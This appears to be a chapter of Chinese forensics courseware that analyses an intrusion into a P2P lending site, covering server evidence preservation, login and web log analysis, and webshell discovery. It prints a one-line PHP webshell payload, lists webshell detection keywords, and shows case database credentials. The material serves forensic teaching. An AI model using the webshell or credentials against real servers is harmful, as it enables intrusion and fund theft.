《電子數(shù)據取證技術》課件-第12章

12.電子數(shù)據取證綜合案例分析目錄CONTENTS12.1案情介紹12.2案件的證據固定12.3數(shù)據分析過程12.4分析漏洞原因12.5調查結果與評價12.1案情介紹12.1.1主要案情2015年6月9日，P2P金融網站“”網站管理人員接到用戶投訴，稱其錢包中資金不翼而飛。管理員開始誤以為是系統(tǒng)錯誤，經嘗試排查后未發(fā)現(xiàn)明顯異常，在排查過程中又接到多名用戶投訴，同樣聲稱其帳戶中資金不知去向。管理員此刻才意識到系統(tǒng)可能被黑客入侵，于是立即停止運行服務器中Web服務和數(shù)據庫服務，向警方報案以確定攻擊者、攻擊方法、攻擊來源、攻擊時間等。12.1.2取證要求委托方提取委托要求為：1.對被攻擊服務器中的網站、數(shù)據庫、日志等涉案相關數(shù)據進行證據固定；2.對上述證據固定結果進行分析，提取攻擊者IP、攻擊時間、攻擊方法；3.提取攻擊者所使用的銀行卡、身份證等信息并分析攻擊者轉移資金的方法；4.對攻擊者的攻擊行為進行分析，找出攻擊者所使用的漏洞，并分析漏洞形成原因。12.1.3主要難點問題近年來隨著司法機關對黑客類案件打擊力度的不斷增強，惡意的網站攻擊者對于打擊手段也有所了解，具有了一定的反偵察意識。黑客在作案時，經常使用代理服務器進行過渡，以隱藏自己的真實IP地址。同時，在進行這類金融類犯罪時，會有一個長期潛伏和準備的過程，盡可能地隱藏自己在被入侵系統(tǒng)中的存在感、減少對系統(tǒng)環(huán)境的破壞或修改，從而避免引起系統(tǒng)管理員的察覺。這種作案方式往往會導致更大的損失，與以破壞系統(tǒng)為目的的入侵類案件中的手法有明顯的區(qū)別。案件的證據固定12.212.2案件的證據固定根據委托人的要求、案件類型及與委托方詳細的溝通后，初步達成以下取證與分析步驟：1.了解被入侵服務器的相關參數(shù)及運行狀態(tài)；2.根據服務器的具體狀況，選擇合適的證據固定工具，制定證據固定計劃；3.根據證據固定計劃對被入侵服務器中所有涉案數(shù)據進行證據固定操作；4.對證據固定結果進行分析，提取入侵時間、地點、IP、工具、方法等相關信息；5.出具應急響應報告、計算機司法鑒定報告，對可能存在的系統(tǒng)漏洞提供合理修補建議。12.2.1了解被入侵服務器相關參數(shù)及運行狀態(tài)在正式取證之前，需要對目標服務器進行一個大概的了解，并根據目標服務器的情況制定證據固定計劃。被入侵服務器情況簡介如下：1.被入侵服務器屬于阿里云服務器，委托方提供了該服務器的IP地址、連接用戶名及密碼；2.被入侵服務器操作系統(tǒng)運行的是Linux，可直接使用“ssh”客戶端遠程登錄；3.被入侵服務器Web服務使用的是Apache，使用的編程語言為PHP；4.被入侵服務器后端數(shù)據庫使用的是MySql。由于被入侵服務器運行于阿里云服務器中，調查員無法物理接觸檢材服務器，所以證據固定工作需要通過遠程勘驗的形式進行。12.2.2制定證據固定計劃對服務器的遠程證據固定大致包括三個步驟：1.收集被入侵服務器的系統(tǒng)信息，包括進程、端口、歷史命令執(zhí)行記錄、系統(tǒng)日志、磁盤、內存等信息。2.提取被入侵服務器Web應用配置和相關數(shù)據3.提取被入侵服務器數(shù)據庫配置和相關數(shù)據12.2.3選擇證據固定工具本案涉及到Linux服務器的遠程數(shù)據固定，選擇的工具包括：屏幕錄像工具、遠程SSH連接工具、遠程文件下載工具、服務器系統(tǒng)信息提取工具等。對Linux系統(tǒng)信息提取選擇使用系統(tǒng)提供的工具，完成對系統(tǒng)基本信息、進程、網絡、端口等信息的提取，包括登錄日志提取工具“l(fā)ast”，網絡配置管理工具“ifconfig”，網絡數(shù)據抓包工具“tcpdump”，網絡端口信息工具“netstat”等。此外用到的工具還包括：1.屏幕錄像軟件---FSCapture，屏幕錄像的好處是交互性更好、后續(xù)屏幕展示的清晰度要遠高于數(shù)碼攝像機。2.遠程連接工具或軟件---putty，是Windows桌面環(huán)境中連接類Linux終端服務的首選工具之一。3.遠程文件下載工具---WinScp，可通過SSH協(xié)議直接操作遠程Linux服務器中文件，進行上傳、下載、增加、刪除等操作，使用方便、直觀、易操作。4.MySql數(shù)據庫的固定---MySqldump，MySql數(shù)據庫系統(tǒng)中自帶的數(shù)據庫轉儲工具。12.2.4連接到遠程服務器此處選擇的連接工具是“putty”，從網址“/”下載Windows桌面程序安裝包，安裝包MD5值為“983d8c71dd6eeed78012112b85734318”。運行安裝完成的“putty”工具，彈出窗口如下：12.2.4連接到遠程服務器設置遠程服務器的IP地址、連接用戶名及對應用的密碼。選擇“登錄”按鈕。啟動屏幕錄像軟件“FFCapture”,選擇“錄制整個屏幕”按鈕，見下圖：12.2.4連接到遠程服務器遠程固定正式開始前需進行時間校準，啟動瀏覽器程序訪問網絡授時網站“/”，該網站中會動態(tài)顯示當前北京標準時間，見下圖：12.2.5固定所有用戶歷史執(zhí)行記錄Linux系統(tǒng)有一個特性，默認會將用戶在終端環(huán)境下執(zhí)行過的命令記錄全部存儲在該用戶所對應的用戶數(shù)據目錄的特定文件中，例如，“.bash_history”文件。該文件是一個純文本文件，可使用文本編輯器工具打開、查找、分析。文件名的第1個字符“.”表明這是一個默認被系統(tǒng)隱藏的特殊文件，使用ls命令列出目錄中所有文件時，默認是不會列出使用“.”開頭的文件，除非使用是“-a”選項（該選項的作用是列出指定目錄中所有文件及目錄、包括默認不顯示的系統(tǒng)文件、特殊文件）?！?bash_history”可以通過“$HISTSIZE”環(huán)境變量設置保存記錄數(shù)的大小，根據Linux發(fā)行版的不同其大小設置不一樣，其中CentOS的默認設置是1000條記錄，所以在超過1000條記錄時就會發(fā)生記錄被覆蓋的情況。通常情況下，調查員在執(zhí)行證據固定過程中會優(yōu)先固定那些易失性數(shù)據、可能存在被修改可能的數(shù)據。遠程服務器一直處于運行狀態(tài)，即系統(tǒng)處于不斷變化的過程中，而且對證據的固定過程本身也會引起服務器的狀態(tài)變化和內存數(shù)據的修改。在RFC3227中，列出了各種動態(tài)信息的級別以及獲取的優(yōu)先級。12.2.5固定所有用戶歷史執(zhí)行記錄在本案例中，就應該在減少對原始數(shù)據的“破壞”的情況下，優(yōu)先獲取服務器中可能會變化的動態(tài)數(shù)據，同時做好數(shù)據的完整性校驗，調查員在現(xiàn)場的所有操作要經得起后續(xù)的證據審核。如果只是提取當前登錄的“root”用戶的命令行歷史記錄，可以直接執(zhí)行“history>bash_history.log”或“cp~/.bash_historybash_history.log”，將當前用戶的命令歷史記錄數(shù)據保存到“bash_history.log”文件中。如果要查找并提取其它用戶的命令執(zhí)行歷史記錄，最快速有效的辦法是執(zhí)行指令“find/-name“.bash_history”，查找到所有當前系統(tǒng)中用戶的“.bash_history”文件，并使用“cp”指令一一將上述找到的“.bash_history”文件保存到指定目錄中。12.2.6固定系統(tǒng)時間對像系統(tǒng)的時間可能會與當前位置的標準時間或存在一定誤差，尤其是那些比較老的系統(tǒng)、或者管理員沒有開啟“時間同步”功能的系統(tǒng)。幾分鐘、幾秒鐘的誤差就可能會給后續(xù)的調查分析帶來很多的麻煩，所以調查員在開始就應該注意記錄和校準這個誤差。在固定開始時記錄“固定開始時間”，在固定結束時記錄“固定結束時間”是一個好習慣。筆者在實際案例中一般都會在固定開始時執(zhí)行語句“date>date_start.log”將當前系統(tǒng)時間直接保存到“date_start.log”文件中，在固定結束后執(zhí)行“date>date_end.log”將固定結束時間保存至“data_end.log”文件中。這樣在后期撰寫證據固定與分析報告時會直接引用這兩個時間值，省卻了記憶混亂的麻煩。在固定系統(tǒng)時間的同時需要記錄當前時區(qū)的標準時間與服務器時間的誤差并記錄在文件或某個日志中。提取當前時區(qū)標準時間一般有兩個辦法，一個是直接訪問授時服務器域名“/”，如果沒有條件直接訪問上述授時服務器，二是通過手機拔打時間查詢電話號碼“12117”，通過語音方式獲取當前時區(qū)比較精準的時間。并將上述獲取結果與服務器時間進行比較并記錄下兩者之前誤差值。12.2.7固定進程信息系統(tǒng)進程信息屬于“易失”信息的一種，在“黑客入侵”類案件的分析中尤其重要。Linux系統(tǒng)中提取進程信息可通過“ps”命令完成。執(zhí)行指令“psaux>ps.log”，可將當前系統(tǒng)啟動的進程列表信息保存到“ps.log”文件中。見下圖：圖12-412.2.7固定進程信息系統(tǒng)進程信息屬于“易失”信息的一種，在“黑客入侵”類案件的分析中尤其重要。Linux系統(tǒng)中提取進程信息可通過“ps”命令完成。執(zhí)行指令“psaux>ps.log”，可將當前系統(tǒng)啟動的進程列表信息保存到“ps.log”文件中。這種做法有一個弊端，即獲取出的進程列表信息只是包含當前系統(tǒng)中依然存活著的進程，而對于那些已經執(zhí)行退出的進程則毫無辦法。此時，可以獲取系統(tǒng)的整個內存鏡像，后續(xù)對內存鏡像進行分析可能會找到“消失”的進程信息。12.2.8固定網絡連接信息網絡連接信息屬于“易失性”信息的一種，對于“黑客入侵”類案件同樣重要。在Linux系統(tǒng)中可通過內置命令“netstat”提取網絡連接信息，需要注意的是在Centos7.0后的版本中netstat被ss命令所取代，不過兩者使用的參數(shù)是類似的。執(zhí)行指令“netstat-apn>netstat.log”可將當前系統(tǒng)中進程正在連接或監(jiān)聽的網絡端口列表保存到“netstat.log”文件中，見下圖：圖12-512.2.8固定網絡連接信息網絡連接信息屬于“易失性”信息的一種，對于“黑客入侵”類案件同樣重要。在Linux系統(tǒng)中可通過內置命令“netstat”提取網絡連接信息，需要注意的是在Centos7.0后的版本中netstat被ss命令所取代，不過兩者使用的參數(shù)是類似的。執(zhí)行指令“netstat-apn>netstat.log”可將當前系統(tǒng)中進程正在連接或監(jiān)聽的網絡端口列表保存到“netstat.log”文件中。這種做法也有與“提取進程信息”同樣的一個弊端，即這種指令獲取出的進程端口列表信息只是指當前執(zhí)行指令狀態(tài)時系統(tǒng)內存中依然存活著的進程端口列表。但對于那些處于定時還沒有執(zhí)行，或定期執(zhí)行的可疑程序是不會被“抓到”的。一個簡便有效的辦法是在執(zhí)行調查過程中多次調用“netstat-apn>netstat.log”這個指令，保存不同時間段的進程端口列表。12.2.9固定磁盤信息提取目標系統(tǒng)中磁盤信息可幫助調查員快速了解目標系統(tǒng)中數(shù)據量，同時對系統(tǒng)數(shù)據的大致分布做出分析工作量預估和數(shù)據分布的初步推測，哪個分區(qū)保存的是應用數(shù)據，哪個分區(qū)保存的是數(shù)據庫，哪個分區(qū)保存的日志等。在Linux系統(tǒng)中可通過執(zhí)行指令“df-h>df.log”提取系統(tǒng)中可使用的分區(qū)信息。見下圖：圖12-612.2.9固定磁盤信息執(zhí)行指令“fdisk-l>fdisk.log”可提取當前系統(tǒng)中磁盤、各分區(qū)大小、開始扇區(qū)、結束扇區(qū)等信息。見下圖：圖12-712.2.9固定磁盤信息執(zhí)行指令“mount>mount.log”可提取系統(tǒng)中文件系統(tǒng)加載點信息，見下圖：圖12-812.2.10固定網卡信息Linux系統(tǒng)中可通過執(zhí)行指令“ifconfig>ifconfig.log”提取目標系統(tǒng)的網卡、IP地址綁定等信息。在一些案例中存在一臺服務器綁定多個IP地址的情況，使用多個IP地址主要用于分流或防止某個IP出現(xiàn)故障導致服務器無法提供正常服務，而備用IP地址可繼續(xù)提供服務。多個IP也可以將不同類型的數(shù)據發(fā)送到不同的通道，達到有效區(qū)別不同類型數(shù)據、提高網絡性能的目的。12.2.11固定用戶信息Linux系統(tǒng)中用戶信息、登錄密碼相關的數(shù)據保存在“/etc/passwd”和“/etc/shadow”文件中，這兩個文件都是文本文件。其中，shadow文件內容結構見下圖：圖12-912.2.11固定用戶信息該文件中第1列保存用戶ID，第2列是加密后的密碼：1.該列留空，即"::"，表示該用戶沒有密碼。2.該列為"!"或"*"，表示該用戶無法使用密碼登錄，但是其他的登錄方式是不受限制的，如ssh公鑰認證的方式，su的方式。3.該列以"!"或"!!"開頭，則表示該用戶被鎖定。4.該列為"!!"，即":!!:"，表示該用戶從來沒設置過密碼。5.如果格式為"$id$salt$hashed"，則表示該用戶設置了登錄密碼。其中$id$的id表示密碼的加密算法，$1$表示使用MD5算法，$2a$表示使用Blowfish算法，"$2y$"是另一算法長度的Blowfish,"$5$"表示SHA-256算法，而"$6$"表示SHA-512算法。12.2.12固定用戶登錄日志信息用戶登錄日志在“黑客類案件”中有著舉足輕重的作用。Linux系統(tǒng)對于用戶“成功”、“失敗”登錄狀態(tài)的日志分別使用了不同的文件來保存?！俺晒Α钡卿浫罩居涗洷４嬖凇?var/log/wtmp”文件中，該文件屬于二進制結構特殊文件，文件頭及部分內容見下圖：圖12-1012.2.12固定用戶登錄日志信息“wtmp”文件中的內容可通過執(zhí)行“l(fā)ast”指令查看，在目標系統(tǒng)中執(zhí)行“l(fā)ast>last.log”，可以將系統(tǒng)中用戶成功登錄的日志保存到“l(fā)ast.log”文件中，部分登錄記錄見下圖：圖12-1112.2.12固定用戶登錄日志信息“/var/log/wtmp”文件中同時記錄了用戶的登錄IP、登錄時間、登錄時長等信息。這些信息對黑客行蹤的分析溯源有著非比尋常的重要性?！發(fā)ast”命令可以通過“-f”參數(shù)分析其他文件中的登錄信息，例如：“l(fā)ast-fwtmp1”?！笆　钡卿浫罩颈４嬖凇?var/log/btmp”文件中，該文件與“/var/log/wtmp”文件擁有相同的結構。如果發(fā)現(xiàn)這個“btmp”文件過大（相對wtmp文件而言），就應該意識到服務器可能受到過暴力破解登錄密碼的攻擊。12.2.13固定“apache”應用數(shù)據在Linux系統(tǒng)中，Apache是最常用的Web服務器之一，經常以“httpd”服務的形式運行。通過“servicehttpdstart”或“servicehttpdstop”命令可以啟動或關閉服務。默認情況下Apache安裝路徑為“/usr/”,Apache服務配置文件默認保存在“/etc/httpd/conf”目錄中。配置文件中“DocumentRoot”參數(shù)中定義了Web目錄的根路徑，見下圖：圖12-12目標網站的日志保存在logs/jiudai-access.log文件中12.2.13固定“apache”應用數(shù)據上圖中路徑“DocumentRoot”屬性指明該域名“”Web目錄在“/data/www”。執(zhí)行指令“tarczvfwww.tar.gz/data/www”將該目錄中所有文件打包保存到“www.tar.gz”文件中。圖12-12目標網站的日志保存在logs/jiudai-access.log文件中12.2.14固定Apache日志Apache服務配置文件“http.conf”中,“LogPath”屬性定義了Web服務器訪問日志默認保存路徑，該日志文件路徑也可以由虛擬主機配置文件中CustomLog參數(shù)指定，見下圖：圖12-1312.2.14固定Apache日志Apache服務配置文件“http.conf”中,“LogPath”屬性定義了Web服務器訪問日志默認保存路徑，該日志文件路徑也可以由虛擬主機配置文件中CustomLog參數(shù)指定。路徑“l(fā)ogs”中保存所有Web應用的用戶訪問日志，這些日志文件的文件名格式由配置文件中的參數(shù)“CustomLog”決定。在本案例中該參數(shù)為“l(fā)ogs/access_log%Y%m%d.log”，即日志文件每天生成一個，文件名的形式為“access_log”+“年”+“月”+“日”+“.log”。從該目錄中提取日志文件共82個，總容量共2.3GB，日志開始日期為“2015-03-30”，日志結束日期為“2015-06-19”。12.2.15固定數(shù)據庫在復雜的Web應用中，后端可能會通過數(shù)據庫服務持久化保存應用數(shù)據。具體的數(shù)據庫選擇并不統(tǒng)一，在證據固定時期，調查員可以根據Web應用中的配置文件到找到數(shù)據庫服務器的IP地址、用戶名、密碼等信息。在本案中，調查員通過分析Web應用中的數(shù)據庫配置文件“dbconfig.php”，確認后臺數(shù)據庫為mysql，數(shù)據庫服務器的IP地址為“l(fā)ocalhost”,連接的用戶名為“dw@h#53X#$”，連接密碼為“re26~D5j@@”。配置文件中的參數(shù)見下圖：圖12-1412.2.15固定數(shù)據庫對數(shù)據庫的證據固定有多種方法可選：1、直接復制數(shù)據庫存儲文件；2、將數(shù)據庫中所有表中的數(shù)據導出保存為“.csv”文件；3、將數(shù)據庫中所有數(shù)據及表結構轉儲為“.sql”文件。這幾種固定方式各有優(yōu)缺點。直接復制數(shù)據庫存儲文件比較適用于用戶量不大、讀寫操作不是特別頻繁、可以短暫停止數(shù)據庫服務的情形。這種證據固定方式，對數(shù)據庫文件的同步性要求比較高，如果數(shù)據庫沒有被停止的情況下復制文件時數(shù)據庫產生的寫操作，可能導致數(shù)據庫文件中部分數(shù)據不同步，后期搭建運行環(huán)境時會經常性的遇到檢查環(huán)境與運行環(huán)境不一、數(shù)據庫主庫文件與日志文件不同步等無法還原的操作，所以這種方法雖然簡單，對調查人員技術要求不高，但是并不推薦。12.2.15固定數(shù)據庫執(zhí)行指令“select*intooutfileusers.csvfieldsterminatedby‘,’linesterminatedby‘\r\n’fromusers”,可將數(shù)據庫中的某個表保存為“.csv”文件。由于“.csv”文件中并不包含數(shù)據表字段的定義信息在數(shù)據表比較多的情況下會對調查員的后期分析工作會造成一定的困擾。利用數(shù)據庫管理工具將數(shù)據庫內容轉儲為“.sql”格式的文件，對后續(xù)的分析工作更友好?！?sql”是純文本文件，方便壓縮、搜索、導入、導出、兼容性較好。在mysql數(shù)據庫中使用mysqldump程序對數(shù)據庫中所有數(shù)據及數(shù)據庫結構進行證據固定，執(zhí)行指令“mysqldump-udw@h#53X#$-Pre26~D5j@@jiudai>jiudai.sql”，可以將數(shù)據庫jiudai中所有數(shù)據表、函數(shù)、事件等對像全部被保存到“jiudai.sql”文件中。12.2.16固定數(shù)據庫日志MySQL數(shù)據庫中常用的日志有Binlog、generallog、慢查詢日志等幾種類型。Binlog日志記錄了數(shù)據庫上的所有改變，并以二進制的形式保存在磁盤中，通過該文件可將數(shù)據庫任意恢復到某個時間點。Binlog日志文件默認保存在數(shù)據庫的數(shù)據目錄中，在對數(shù)據安全性要求較高的業(yè)務應用中，開啟Binlog日志。通過登錄MySQL數(shù)據庫并執(zhí)行“showvariableslike‘Binlog’”查詢該日志功能是否開啟?？梢酝ㄟ^執(zhí)行“setglobalvariablesBinlog=on”語句開啟Binlog日志功能，通過執(zhí)行“setglobalvariablesBinlog=off”關閉Binlog日志功能。generallog保存所有數(shù)據庫中執(zhí)行的sql語句，包括對數(shù)據庫的查詢、增加、修改、刪除等操作。這種記錄對數(shù)據庫的審核、調優(yōu)以及取證分析會比較有用，但是開啟generallog對數(shù)據庫的性能影響會比較大。generallog查詢日志支持將日志記錄寫入文件，也支持將日志記錄寫入數(shù)據庫表12.2.16固定數(shù)據庫日志MySQL的慢查詢日志是用來記錄數(shù)據庫運行中響應時間超過閥值的語句，具體是指運行時間超過“l(fā)ong_query_time”值的SQL語句。long_query_time的默認值為10，意思是運行10秒以上的語句。默認情況下，MySQL數(shù)據庫并不啟動慢查詢日志，需要手動來設置這個參數(shù)。如果不是調優(yōu)需要的話，一般不建議開啟這個服務，因為慢查詢日志或多或少會影響數(shù)據庫的性能。慢查詢日志支持將日志記錄寫入文件，也支持將日志記錄寫入數(shù)據庫表。本案例中，檢材服務器中的MySQL數(shù)據庫啟用了Binlog日志，要對Binlo日志進行固定，需要將數(shù)據目錄中所有Binlog文件打包即可“tarcxvfbin.log.tar.gz./data/Binlog*.*”。12.3數(shù)據分析過程12.3.1進程分析系統(tǒng)進程列表中列出了當前系統(tǒng)所有進程的信息，包括進程ID、父進程ID、可執(zhí)行程序全路徑、啟動時間等信息。進程分析的分析目標是得到當前系統(tǒng)應用、服務等系統(tǒng)狀況，還要分析當前進程列表中是否有一些不常見的、異常的進程，這里并沒有什么工具可以輔助調查員來確認哪個進程是可疑進程，哪個進程具有異常操作，這個分析過程基本依賴調查員的經驗。本案例中現(xiàn)場提取的進程列表部分截圖如下：圖12-1512.3.1進程分析對上述進程列表中主要進程做簡單描述：/sbin/initd:該程序是系統(tǒng)中所有程序的父進程。這個進程的PID總是1，它負責啟動組成Linux操作系統(tǒng)的其他進程。httpd：Apache服務的進程。mysqld：mysql數(shù)據庫系統(tǒng)的后臺服務進程。crond：crond是定期執(zhí)行指定命令的守護進程，可以通過crontab進行設置。crontab是一個命令，常見于Unix和類Unix的操作系統(tǒng)之中，用于設置周期性被執(zhí)行的指令。該命令從標準輸入設備讀取指令，并將其存放于“crontab”配置文件中，以供后續(xù)程序讀取和執(zhí)行。在Linux系統(tǒng)中定時任務一般可以分為3種：①at:適合僅執(zhí)行一次就結束的調度命令，需要啟動一個后端的atd服務。②Crontab:需要啟動一個crond服務才行，crond服務通過crontab命令實現(xiàn)。③Anacron:無法周期性執(zhí)行，只能以天為周期，但有個特點，在關機狀態(tài)下未執(zhí)行的任務，下次開機時可以補上執(zhí)行。watchdog:由系統(tǒng)服務運營商提供的安全插件。ksoftirqd:系統(tǒng)軟件中斷處理線程，屬于系統(tǒng)正常運行所必須的線程。從進程列表中所反應的狀態(tài)看，檢材服務器并不存在被入侵后植入的可疑進程。12.3.2分析網絡連接從檢材服務器中提取到的網絡連接信息列表如下：圖12-1612.3.2分析網絡連接從上述網絡連接信息可以發(fā)現(xiàn)，系統(tǒng)中主要提供了Apache、MySQL數(shù)據庫、sshd登錄等服務，未發(fā)現(xiàn)異常的網絡連接端口，未發(fā)現(xiàn)系統(tǒng)明顯的主動連接外部服務器的異常流量。12.3.3分析啟動項從檢材中提取到的crontab啟動程序列表為空，未發(fā)現(xiàn)異常啟動進程項。12.3.4分析登錄日志從檢材中提取登錄信息共102條，部分登錄信息見下表：表12-112.3.4分析登錄日志對上述列表中登錄記錄符合案發(fā)時間段的所有IP進行提取并去重，共涉及IP地址10個。上述10個IP地址，經與受害單位服務器管理人員核對，上述IP登錄地址均屬于公司維護人員常用IP，并未發(fā)現(xiàn)其它異常登錄地址。12.3.5分析錯誤登錄日志錯誤登錄日志用于記錄所有用戶的未正確輸入用戶名、密碼情況的。從該記錄文件中提取錯誤登錄日志共3389條。對所有錯誤登錄日志進行匯總并統(tǒng)計，提取所有錯誤登錄記錄的IP地址，部分IP列表見下表：表12-212.3.5分析錯誤登錄日志對所有嘗試使用錯誤用戶名及密碼登錄的IP地址去重并統(tǒng)計共提取到35個獨立IP訪問記錄，見下表：上述錯誤登錄日志表明有入侵者試圖通過窮舉用戶名密碼，爆破用戶弱口令的方式進行入侵。使用上述錯誤登錄IP地址作為關鍵詞檢測服務器正常登錄日志中是否有來自上述IP地址的成功登錄IP。經檢測從檢材服務器的成功登錄日志中未檢測出包含上述嘗試密碼破解的錯誤登錄IP地址的成功登錄記錄。這表明雖然有黑客嘗試入侵目標服務器，但由于目標服務器用戶名、密碼并不屬于弱密碼，所以黑客并沒有成功的破解出正確的登錄密碼。表12-312.3.6分析Web在涉及服務器入侵的案件中，Web分析總是整個調查取證過程中的重頭戲。對于一般的黑客來說，找一個Web漏洞所花費的精力、時間、成本要比挖出一個系統(tǒng)漏洞要容易的多。在筆者參與調查的大部分黑客入侵類案件很大一部分都是從Web漏洞或WebShell的查找開始。表12-212.3.6分析Web分析Web中是否存異常的WebShell文件，常用方法：1.通過安全軟件快速掃描整個Web目錄。通常來講使用Web安全軟件要比調查員手工分析或通過經驗來查找可疑文件要更高效、簡潔、適用性強、誤報少。且這種方法不限于調查員的調查經驗，對于初次涉及案件調查的調查員或對黑客調查類案件并不熟悉的調查員來說不能不說是一種“速效救心丸”。如果調查員比較深入了解了案件的前因后果，也可以通過關鍵詞、時間排除法等快速定位可疑文件。比如管理員確定目標Web目錄中的所有文件在最近1個月內根本沒有更改過。那么可以通過文件的時間信息快速提取檢材中最近1個月內被創(chuàng)建或修改過的可執(zhí)行程序“find.-name“*.php”-a-ctime-30”，如果的確能找到1個月被修改或創(chuàng)建的.php，再通過分析目標.php文件的功能代碼，確定該文件是否具有惡意或可疑功能。也可通過WebShell中常用的關鍵詞直接搜索整個Web目錄中所有文件。比如“execute”、“@eval($_GET”、“@system($_POST”、“assert($_REQUEST”、“file_get_contents”?？梢灾苯邮褂胓rep指令搜索上述關鍵詞。甚至可以結合文件的創(chuàng)建時間、修改時間信息進一步做更復雜的可疑文件搜索。表12-212.3.6分析Web在該案例中，筆者直接使用安全軟件“D盾”對目標Web目錄中所有文件進行了掃描。不負所望，直接從該目錄中提取到了一個可疑文件“uploaddyp2p.php.bmp”，該文件掃描結果見下圖：圖12-1712.3.6分析Web該文件大小為2kb，md5值為“460133aa42302c0e78656266959e7057”。該文件部分代碼內容見下圖：圖12-19圖12-1812.3.6分析Web該文件中存在一句話木馬的特征代碼“<?php@assert(base64_decode($_POST[h3len]))?>”。Tips:上述代碼中主要功能代碼“@assert”（斷言）的主要作用是：編寫代碼時，我們總是會做出一些假設，斷言就是用于在代碼中捕捉這些假設，可以將斷言看作是異常處理的一種高級形式。程序員斷言在程序中的某個特定點該表達式值為真。如果該表達式為假，就中斷操作。即要決斷該斷言的真假，必須要執(zhí)行“@assert”后的代碼“base64_decode”函數(shù)解碼后的程序。該程序的內容又來源于客戶端提交的參數(shù)“h3len”中的內容。即如果客戶端程序通過參數(shù)“h3len”提交了一些影響檢材服務器安全性、穩(wěn)定性的指令，該程序也不做任何檢查的將客戶端所提交程序完全執(zhí)行?？梢栽谌魏螘r候啟用和禁用斷言驗證，因此可以在測試時啟用斷言，而在部署時禁用斷言。同樣，程序投入運行后，最終用戶在遇到問題時可以重新起用斷言。有趣的是該文件的擴展名為.bmp，即使該文件中存在可疑的一句話木馬代碼，但因為該文件的擴展名為.bmp屬于不可執(zhí)行文件。當客戶端瀏覽器訪問該文件時，Web服務器不會解釋該文件中的任何代碼而僅僅把該文件所有內容推送到客戶端，由客戶端瀏覽器去展示整個文件的內容。12.3.6分析Web雖然該木馬文件無法給分析員提供直接幫助，確認并定位可疑黑客的位置，但卻可以通過該文件的屬性信息進行擴展分析：1.以我們提取到的文件的創(chuàng)建、修改時間作為一個坐標來查找那個時間前后的可疑文件。2.雖然該文件無法執(zhí)行，但可以通過提取到的Web訪問日志分析是哪個用戶上傳了該文件或第1個成功訪問該文件的用戶最有為可疑。在該案例中調查員充分利用了上述可疑文件的時間特征，執(zhí)行指令“find.Typef-a-name“*.php”-aneweruploadyp2p.php.bmp”以該圖片文件的創(chuàng)建時間為線索，找到了在該圖片文件創(chuàng)建成功后唯一的擴展名為.php的可執(zhí)行文件“adminer.php”。12.3.6分析Web該文件部分內容見下圖：圖12-2012.3.6分析Web由于該程序代碼太長且存在代碼混淆行為，無法短時間內容分析清楚該程序的全部功能。對于程序的功能分析一般可以分為靜態(tài)分析、動態(tài)分析兩方式。閱讀源碼或逆向后的代碼屬于靜態(tài)分析。對于動態(tài)分析可以將目標程序運行起來通過該程序的行為來判斷該程序的功能。在鑒定計算機中安裝.php運行環(huán)境并將該程序文件“adminer.php”復制到鑒定計算機中所安裝的apache的Web目錄“c:\xampp\apache\htdoc”，并通過web瀏覽器直接訪問該頁面的url地址“/adminer.php”，見下圖：圖12-2112.3.6分析Web從上圖中的選擇參數(shù)的內容來看，該程序的功能屬于數(shù)據庫管理類的程序。需要提供目標服務器的登錄IP地址、用戶名、密碼信息才可以登錄。這里調查員進行測試時使用鑒定計算機中臨時搭建的mysql數(shù)據庫用戶名“root”、密碼“root”直接成功登錄進了鑒定計算機中的mysql數(shù)據庫并可對鑒定計算機中mysql數(shù)據庫的內容進行直接管理（增加、修改、刪除、查詢等），部分功能見下圖:圖12-2212.3.6分析Web綜上所述，程序文件“adminer.php”是一個完全具備數(shù)據庫操作功能的管理軟件。該軟件屬于開源、免費的數(shù)據數(shù)據庫管理程序。該程序本身并不具備任何惡意功能。所以即使使用安全軟件對該程序進行“安全檢測”也不會檢測出其惡意行為，因為其本身僅僅是作為數(shù)據庫管理程序在使用。從被入侵服務器的系統(tǒng)管理員處得知該程序不屬于管理人員自己主動在服務器中使用的數(shù)據庫管理軟件，明顯該程序是由“黑客”上傳并使用。既然可以確認由黑客上傳了該數(shù)據庫管理軟件，調查員的下一步操作就是分析該數(shù)據庫管理軟件對當前被入侵系統(tǒng)的影響、該軟件在當前被入侵的系統(tǒng)中可以完成哪部分功能以及上傳者、訪問者都有哪些人進行了哪些訪問、從哪里訪問、什么時間進行了訪問，訪問是否成功，訪問該程序的主要目的是什么？帶著上述一系列的疑問，進行入下列更深一步的了解與分析。12.3.7分析Web日志本節(jié)中主要分析目標是對檢材服務器中所提取到的82個web日志文件進行分析，并嘗試從日志中回答上一小節(jié)所提出的幾個問題：數(shù)據庫管理程序“adminer.php”的上傳者、訪問者都有哪些人進行了哪些訪問、從哪里訪問、什么時間進行了訪問，訪問是否成功，訪問該程序的主要目的是什么？部分日志文件列表見下圖:圖12-2312.3.7分析Web日志首先，我們第一個明確的目標是提取所有訪問過數(shù)據庫管理程序文件“adminer.php”文件的記錄。對于純關鍵詞搜索的功能來說Linux系統(tǒng)中自帶的grep指令可以完全滿足要求。執(zhí)行指令“grep-ai“adminer.php”access_log*”從上述所有日志文件中提取到訪問“adminer.php”文件的記錄共590條（將上述所有訪問記錄保存到adminer.php.log文件中），其中部分日志記錄內容如下：圖12-2412.3.7分析Web日志目標服務器所記錄的web日志格式主要由下列幾列組成：客戶端訪問IP地址、訪問時間、訪問所使用的方法及url地址、返回訪問結果狀態(tài)、返回的頁面數(shù)據的大小、訪問前來源url地址、客戶端的瀏覽器型號、版本號等信息（從左至右）。從上述590條訪問日志中提取到多個客戶端信息為“compatible;MSIE6.0;WindowsNT5.1;Alibaba.Security.Heimdall.240968”即阿里云服務商的“Heimdall”掃描器的掃描記錄。上述安全掃描器的掃描記錄對于調查員的分析是無意義的，所以需要對提取到的全部590條訪問adminer.php文件的記錄中排除所有來源于阿里云“Heimdall”掃描器的掃描記錄，執(zhí)行下列指令可達到排除掃描器掃描結果的操作“grep-v'Alibaba'../adminer.php.log>../adminer_exclude_Alibaba.log”。排除阿里安全掃描器后共提取到319條訪問“adminer.php”記錄。12.3.7分析Web日志上述319部分日志內容見：access_log-20150601:7--[31/May/2015:17:16:32+0800]"GET/modules/admin/adminer.php?username=cjd%7E777%5E&db=changjiudai&edit=dw_account_cash&where%5Bid%5D=13238HTTP/1.1"2004583"/modules/admin/adminer.php?username=cjd%7E777%5E&db=changjiudai&sql=""Mozilla/5.0(WindowsNT6.1;WOW64;rv:38.0)Gecko/20100101Firefox/38.0"對于上一條日志的解析如下：該條日志的訪問時間為“31/May/2015:17:16:32+0800”，該條日志訪問者的IP地址為